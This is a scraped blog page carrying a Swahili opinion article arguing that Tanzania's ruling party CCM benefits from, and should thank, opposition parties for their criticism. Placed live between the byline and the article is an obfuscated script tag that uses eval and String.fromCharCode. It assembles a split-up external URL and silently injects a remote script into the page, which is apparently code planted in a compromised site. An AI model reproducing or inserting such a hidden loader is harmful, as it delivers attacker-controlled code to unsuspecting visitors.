Recent Comments

CCM YAVISHUKURU VYAMA VYA UPINZANI

By Mwafrika Aug 10, 2023
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

CCM WAVISHUKURU VYAMA VYA UPINZAN

NA,ANKO G.

Wakati Chama Cha Mapinduzi (CCM) kikiwa ndicho chma tawala kwa zaidi ya miaka arobaini (40) mpaka sao fanyika leo ni kwasababu ya chama hicho.

Ikumbukwe kuwa mpango wa kila chama cha siasasa ni kupata nafasi ya kuongoza nchi na katika nchi za Afrika chama cha CCM kimepata bahati ya kudumu madarakani kwa muda mrefu kama chama wawalahivyo hiyo ni bahati ya kipekee kwani vipo vyama vingi vimeangushwa.

Mbali na maendeleo ambayo yamefanywa na CCM lakini kuna mahali ambapo bado chama hicho hakifanyi vizuri ampapo vyama vya upinzani vinatumia nafasi hiyo kuikosoa CCM na chama hicho kupata kujikosea na kufanya kwa ufanisi zaidi.

Hivyo basi ninapo sema kwamba CCM ishukuru vyama vya upinzani namanisha kwamba kupitia ukosoaji wa vyama vya upinzani hifanya CCM kufanya yale yanayo pigiwa kerere na upinzani na kushindwa kujitawala.

Nidhahiri kuwa kama nchi ya Tanzania ingekua inaongozwa na chama kimoja yani chama tawala kuna uwezekano wa kufanya vibaya zaidi kwani richa ya vyama vya upinzani kukosoa chamahicho bado Kuna mahali chama hicho hakifanyi vizuri.

Sote ni mashahidi kuwa tangu uchaguzi wa serikali za mitaa mwaka 2019 chama hicho kilipita bila kupingwa na mwaka 2020 chama hicho kilipita bila kupingwa hivyo chama hicho kimakua na nafasi ya uwakilishi kuanzia seriakali za mtaa na serikali kwa ujumla yani viongozi wa chama na serikali wanao tokana na CCM.

Tukitazama bunge la Tanzania kwa sasa limekua likitupiwa lawama kutokana na uendeshwaji wa vikao (Shughuli za Bunge) ukilinganisha na Bunge la kipindi cha Job Ndugai, Anne Makinda, Samweli John Sitta na wengine ambapo Bunge lilikua na wabunge mchanganyiko tofauti na sasa ambapo baadhi ya watu huliita Bunge la CCM.

Katika uongozi, kiongozi bora ni yule anae pokea maoni,ushauri na mawazo kutoka kwa watu wengine kwa kiongozi haimanishi kuwa anaowaongoza amewazidi akili lahasha uongozi ni cheo cha kusimama badala ya wengine au kiranja ambae kazi yake ni kuelekeza wengine na kusimama badala ya wengine mana wote hatuwezi kuwa na nafasi moja.

Asilimia kubwa ya Viongozi wa chama cha CCM wanapo kosolewa wao hujihisi kama wanatukanwa jambo halina ukweli kwani kuna baadhi ya mambo yana kosolewa na vyama vya upinzani nakuna nyakati tunaona yakifanyiwa kazi

Chama Cha Mapinduzi hakina Budi kuvishukuru vya vya upinzani kwani pale chama hicho kinapo kosolewa ni fursa kwa chama hicho kujikosoa na kuona umuhimu wa ushauri kutoka katika vyama hivyo Tanzania ni nchi ya kidemokrasia hivyo kila mtanzania ana uhuru wa kushauri ama kutoa maoni ambayo ipo kikatiba.

Mahitaji ya watanzania ni mawili tu lakwanza ni Uongozi bora na lapili ni Maisha bora kwani vikiwepo hivyo ni rahisi mahitaji ya mhimu kupatokani kwani taifa la Tanzania ni moja kati ya mataifa ambayo yamejaliwa rasilimali zinazo weza kulinufaisha taifa.

Nimalizie kwa kusema kwmba kama Chama Cha Mapinduzi kikitaka kuangushwa kiache kufanyia kazi ushauri wa vyama vya upinzani na yote yanayo pigiwa kerere na vyama vya upinzani, naamini kabisa makala hii itaishi hata nikifa wajukuu zangu watawakumbuaha hili.